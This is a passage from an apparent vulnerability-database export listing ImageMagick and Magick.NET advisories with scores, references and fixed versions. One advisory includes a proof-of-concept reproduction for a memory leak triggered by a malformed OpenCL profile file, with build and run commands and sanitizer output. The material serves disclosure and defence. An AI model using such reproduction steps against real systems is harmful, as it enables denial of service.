2
value 0.00019
scoring_system epss
scoring_elements 0.04924
published_at 2026-04-16T12:55:00Z
3
value 0.00019
scoring_system epss
scoring_elements 0.04978
published_at 2026-04-13T12:55:00Z
4
value 0.00019
scoring_system epss
scoring_elements 0.04968
published_at 2026-04-04T12:55:00Z
5
value 0.00019
scoring_system epss
scoring_elements 0.05015
published_at 2026-04-11T12:55:00Z
6
value 0.00019
scoring_system epss
scoring_elements 0.05035
published_at 2026-04-09T12:55:00Z
7
value 0.00019
scoring_system epss
scoring_elements 0.05019
published_at 2026-04-08T12:55:00Z
8
value 0.00019
scoring_system epss
scoring_elements 0.04986
published_at 2026-04-07T12:55:00Z
9
value 0.00019
scoring_system epss
scoring_elements 0.04997
published_at 2026-04-12T12:55:00Z
10
value 0.00059
scoring_system epss
scoring_elements 0.18616
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25638
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25638
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25638
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/1e88fca11c7b8517100d518bc99bd8c474f02f88
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/1e88fca11c7b8517100d518bc99bd8c474f02f88
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gxcx-qjqp-8vjw
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gxcx-qjqp-8vjw
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25638
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25638
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442105
reference_id 2442105
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442105
10
reference_url https://github.com/advisories/GHSA-gxcx-qjqp-8vjw
reference_id GHSA-gxcx-qjqp-8vjw
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gxcx-qjqp-8vjw
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25638, GHSA-gxcx-qjqp-8vjw
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-62ar-kwbq-nyh3
10
url VCID-69f6-ceje-hyah
vulnerability_id VCID-69f6-ceje-hyah
summary 
ImageMagick: Malicious PCD files trigger 1‑byte heap Out-of-bounds Read and DoS
The PCD coder’s DecodeImage loop allows a crafted PCD file to trigger a 1‑byte heap out-of-bounds read when decoding an image (Denial of service) and potential disclosure of adjacent heap byte.
references
0
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
1
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
2
reference_url https://github.com/ImageMagick/ImageMagick/commit/436e5d2589e3c0adc10d9aa189e81d5d088d8207
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/436e5d2589e3c0adc10d9aa189e81d5d088d8207
3
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wgxp-q8xq-wpp9
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wgxp-q8xq-wpp9
4
reference_url https://github.com/advisories/GHSA-wgxp-q8xq-wpp9
reference_id GHSA-wgxp-q8xq-wpp9
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wgxp-q8xq-wpp9
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases GHSA-wgxp-q8xq-wpp9
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-69f6-ceje-hyah
11
url VCID-6h7x-3rue-kucp
vulnerability_id VCID-6h7x-3rue-kucp
summary 
ImageMagick has a heap buffer over-read via 32-bit integer overflow in MAT decoder
In MAT decoder uses 32-bit arithmetic due to incorrect parenthesization resulting in a heap over-read.

```
=================================================================
==969652==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x506000003b40 at pc 0x555557b2a926 bp 0x7fffffff4c80 sp 0x7fffffff4c70
READ of size 8 at 0x506000003b40 thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28692.json
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28692.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28692
reference_id
reference_type
scores
0
value 0.00021
scoring_system epss
scoring_elements 0.05673
published_at 2026-04-09T12:55:00Z
1
value 0.00021
scoring_system epss
scoring_elements 0.05647
published_at 2026-04-08T12:55:00Z
2
value 0.00021
scoring_system epss
scoring_elements 0.05608
published_at 2026-04-07T12:55:00Z
3
value 0.00021
scoring_system epss
scoring_elements 0.05611
published_at 2026-04-04T12:55:00Z
4
value 0.00021
scoring_system epss
scoring_elements 0.05574
published_at 2026-04-02T12:55:00Z
5
value 0.00023
scoring_system epss
scoring_elements 0.06248
published_at 2026-04-21T12:55:00Z
6
value 0.00023
scoring_system epss
scoring_elements 0.06139
published_at 2026-04-11T12:55:00Z
7
value 0.00023
scoring_system epss
scoring_elements 0.06135
published_at 2026-04-12T12:55:00Z
8
value 0.00023
scoring_system epss
scoring_elements 0.06128
published_at 2026-04-13T12:55:00Z
9
value 0.00023
scoring_system epss
scoring_elements 0.06089
published_at 2026-04-16T12:55:00Z
10
value 0.00023
scoring_system epss
scoring_elements 0.061
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28692
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28692
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28692
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mrmj-x24c-wwcv
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T15:58:29Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mrmj-x24c-wwcv
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28692
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28692
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445890
reference_id 2445890
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445890
9
reference_url https://github.com/advisories/GHSA-mrmj-x24c-wwcv
reference_id GHSA-mrmj-x24c-wwcv
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-mrmj-x24c-wwcv
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-28692, GHSA-mrmj-x24c-wwcv
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6h7x-3rue-kucp
12
url VCID-6meg-yjby-a7gj
vulnerability_id VCID-6meg-yjby-a7gj
summary 
ImageMagick has a Memory Leak in LoadOpenCLDeviceBenchmark() when parsing malformed XML
### Summary

A memory leak vulnerability exists in the `LoadOpenCLDeviceBenchmark()` function in `MagickCore/opencl.c`. When parsing a malformed OpenCL device profile XML file that contains `<device` elements without proper `/>` closing tags, the function fails to release allocated memory for string members (`platform_name`, `vendor_name`, `name`, `version`), leading to memory leaks that could result in resource exhaustion.

**Affected Version**: ImageMagick 7.1.2-12 and possibly earlier versions

---

### Details

The vulnerability is located in `MagickCore/opencl.c`, function `LoadOpenCLDeviceBenchmark()` (lines 754-911).

**Root Cause Analysis:**

1. When a `<device` tag is encountered, a `MagickCLDeviceBenchmark` structure is allocated (line 807-812)
2. String attributes (`platform`, `vendor`, `name`, `version`) are allocated via `ConstantString()` (lines 878, 885, 898, 900)
3. These strings are **only freed** when a `/>` closing tag is encountered (lines 840-849)
4. At function exit (lines 908-910), only the `device_benchmark` structure is freed, but **its member variables are not freed** if `/>` was never parsed

**Vulnerable Code (lines 908-910):**

```c
token=(char *) RelinquishMagickMemory(token);
device_benchmark=(MagickCLDeviceBenchmark *) RelinquishMagickMemory(
  device_benchmark);  // BUG: members (platform_name, vendor_name, name, version) not freed!
```

**Correct cleanup (only executed when `/>` is found, lines 840-849):**

```c
device_benchmark->platform_name=(char *) RelinquishMagickMemory(device_benchmark->platform_name);
device_benchmark->vendor_name=(char *) RelinquishMagickMemory(device_benchmark->vendor_name);
device_benchmark->name=(char *) RelinquishMagickMemory(device_benchmark->name);
device_benchmark->version=(char *) RelinquishMagickMemory(device_benchmark->version);
device_benchmark=(MagickCLDeviceBenchmark *) RelinquishMagickMemory(device_benchmark);
```

---

### PoC

**Environment:**
- OS: Ubuntu 22.04.5 LTS (Linux 6.8.0-87-generic x86_64)
- Compiler: GCC 11.4.0
- ImageMagick: 7.1.2-13 (commit `a52c1b402be08ef8ae193f28ac5b2e120f2fa26f`)

**Step 1: Build ImageMagick with AddressSanitizer**

```bash
cd ImageMagick
./configure \
    CFLAGS="-g -O0 -fsanitize=address -fno-omit-frame-pointer" \
    CXXFLAGS="-g -O0 -fsanitize=address -fno-omit-frame-pointer" \
    LDFLAGS="-fsanitize=address" \
    --disable-openmp
make -j$(nproc)
```

**Step 2: Create malformed XML file**

**Step 3: Place file in OpenCL cache directory**

```bash
mkdir -p ~/.cache/ImageMagick
cp malformed_opencl_profile.xml ~/.cache/ImageMagick/ImagemagickOpenCLDeviceProfile.xml
```

**Step 4: Run ImageMagick with leak detection**

```bash
export ASAN_OPTIONS="detect_leaks=1:symbolize=1"
./utilities/magick -size 100x100 xc:red output.png
```

**ASAN Output:**

```
=================================================================
==2543490==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 96 byte(s) in 2 object(s) allocated from:
    #0 ... in AcquireMagickMemory MagickCore/memory.c:536
    #1 ... in LoadOpenCLDeviceBenchmark MagickCore/opencl.c:807

Direct leak of 16 byte(s) in 1 object(s) allocated from:
    #0 ... in ConstantString MagickCore/string.c:692
    #1 ... in LoadOpenCLDeviceBenchmark MagickCore/opencl.c:878  ← name

Direct leak of 14 byte(s) in 1 object(s) allocated from:
    #0 ... in ConstantString MagickCore/string.c:692
    #1 ... in LoadOpenCLDeviceBenchmark MagickCore/opencl.c:885  ← platform_name

Direct leak of 14 byte(s) in 1 object(s) allocated from:
    #0 ... in ConstantString MagickCore/string.c:692
    #1 ... in LoadOpenCLDeviceBenchmark MagickCore/opencl.c:898  ← vendor_name

Direct leak of 15 byte(s) in 1 object(s) allocated from:
    #0 ... in ConstantString MagickCore/string.c:692
    #1 ... in LoadOpenCLDeviceBenchmark MagickCore/opencl.c:900  ← version

SUMMARY: AddressSanitizer: 203 byte(s) leaked in 18 allocation(s).
```

---

### Impact

**Vulnerability Type:** CWE-401 (Missing Release of Memory after Effective Lifetime)

**Severity:** Low

**Who is impacted:**
- Users who have OpenCL enabled in ImageMagick
- Systems where an attacker can place or modify files in the OpenCL cache directory (`~/.cache/ImageMagick/`)
- Long-running ImageMagick processes or services that repeatedly initialize OpenCL

**Potential consequences:**
- Memory exhaustion over time if the malformed configuration is repeatedly loaded
- Denial of Service (DoS) in resource-constrained environments

**Attack Vector:** Local - requires write access to the user's OpenCL cache directory
references
0
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2
1
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
2
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qp59-x883-77qv
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qp59-x883-77qv
3
reference_url https://github.com/advisories/GHSA-qp59-x883-77qv
reference_id GHSA-qp59-x883-77qv
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qp59-x883-77qv
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.2
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-15ny-qqbj-qyfk
1
vulnerability VCID-1cpn-zvem-v7gt
2
vulnerability VCID-29r3-kvf4-n3hc
3
vulnerability VCID-2zje-ag2v-7kac
4
vulnerability VCID-54da-fzyt-4ud2
5
vulnerability VCID-5uyd-bv33-h7g1
6
vulnerability VCID-5zkt-kcgx-a3e2
7
vulnerability VCID-62ar-kwbq-nyh3
8
vulnerability VCID-69f6-ceje-hyah
9
vulnerability VCID-6h7x-3rue-kucp
10
vulnerability VCID-6rma-wjdv-uqe9
11
vulnerability VCID-6ztv-auh8-27gx
12
vulnerability VCID-acsa-1uwk-fqee
13
vulnerability VCID-anyp-2jr7-73a1
14
vulnerability VCID-b5pd-kk97-gban
15
vulnerability VCID-bd1g-sfsp-37h7
16
vulnerability VCID-bw4q-dt1r-y3e4
17
vulnerability VCID-cbqr-aybx-d3e6
18
vulnerability VCID-cuhw-ew1g-s3h2
19
vulnerability VCID-d8yf-8rff-3yhf
20
vulnerability VCID-dabd-m3mf-3ker
21
vulnerability VCID-dtza-65ku-aber
22
vulnerability VCID-emmr-15qp-vfah
23
vulnerability VCID-f1zu-xb4j-8qhp
24
vulnerability VCID-fnck-7mvx-hqc9
25
vulnerability VCID-g41y-dv8u-3yf1
26
vulnerability VCID-gdg8-aejn-83c4
27
vulnerability VCID-jc5m-7rvc-2qg6
28
vulnerability VCID-jcjk-s89c-mbbm
29
vulnerability VCID-jvq6-xjbu-fkb9
30
vulnerability VCID-kdw5-8y5z-zya5
31
vulnerability VCID-kefv-kpkk-wudf
32
vulnerability VCID-mntx-6yku-3qcx
33
vulnerability VCID-n47w-r932-abey
34
vulnerability VCID-p5aw-n691-nkff
35
vulnerability VCID-pcme-bwan-3bcf
36
vulnerability VCID-r3vw-ncns-cqgb
37
vulnerability VCID-rbdg-vz8x-ykah
38
vulnerability VCID-rj9n-ra1t-77dy
39
vulnerability VCID-rjkf-pdny-2fhn
40
vulnerability VCID-sd54-b8z1-2fg7
41
vulnerability VCID-sd7w-6qv5-73ge
42
vulnerability VCID-sdc2-fcap-abaz
43
vulnerability VCID-sw7g-hxxr-n3e1
44
vulnerability VCID-tv15-dcnu-pbbn
45
vulnerability VCID-utfe-h3b7-jqcj
46
vulnerability VCID-uvpj-a8v5-ebgz
47
vulnerability VCID-vpdn-g1k9-1kdn
48
vulnerability VCID-x44m-x33k-hydn
49
vulnerability VCID-x8c6-9pse-xkc8
50
vulnerability VCID-xbsu-ac6g-53fn
51
vulnerability VCID-y4hn-6bv6-jugw
52
vulnerability VCID-y58b-be93-hbfd
53
vulnerability VCID-yx7r-r7ez-7uhp
54
vulnerability VCID-z9t9-bxf9-hkfk
55
vulnerability VCID-zab9-9tqj-hbhg
56
vulnerability VCID-zpcy-nms7-kuha
57
vulnerability VCID-zx14-t8et-ufcq
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.2
aliases GHSA-qp59-x883-77qv
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6meg-yjby-a7gj
13
url VCID-6rma-wjdv-uqe9
vulnerability_id VCID-6rma-wjdv-uqe9
summary 
mageMagick has a possible use-after-free write in its PDB decoder
A use-after-free vulnerability exists in the PDB decoder that will use a stale pointer when a memory allocation fails and that could result in a crash or a single zero byte write.

```
==4033155==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x5589c1971b24 bp 0x7ffdcc7ae2d0 sp 0x7ffdcc7adb20 T0)
```

```
==4034812==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f099e9f7800 at pc 0x5605d909ab20 bp 0x7ffe52045b50 sp 0x7ffe52045b40
WRITE of size 1 at 0x7f099e9f7800 thread T0
```
references
0
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
1
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
2
reference_url https://github.com/ImageMagick/ImageMagick/commit/168ffe18def968f886c023146a478897866fd621
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/168ffe18def968f886c023146a478897866fd621
3
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-3j4x-rwrx-xxj9
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-3j4x-rwrx-xxj9
4
reference_url https://github.com/advisories/GHSA-3j4x-rwrx-xxj9
reference_id GHSA-3j4x-rwrx-xxj9
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3j4x-rwrx-xxj9
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases GHSA-3j4x-rwrx-xxj9
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6rma-wjdv-uqe9
14
url VCID-6ztv-auh8-27gx
vulnerability_id VCID-6ztv-auh8-27gx
summary 
ImageMagick: Memory Leak in multiple coders that write raw pixel data
A memory leak vulnerability exists in multiple coders that write raw pixel data where an object is not freed. 

```
Direct leak of 160 byte(s) in 1 object(s) allocated from:
```
references
0
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
1
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
2
reference_url https://github.com/ImageMagick/ImageMagick/commit/fe0a49a58ac5b7a18ff2618b6207dcad71123e43
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/fe0a49a58ac5b7a18ff2618b6207dcad71123e43
3
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wfx3-6g53-9fgc
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wfx3-6g53-9fgc
4
reference_url https://github.com/advisories/GHSA-wfx3-6g53-9fgc
reference_id GHSA-wfx3-6g53-9fgc
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wfx3-6g53-9fgc
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
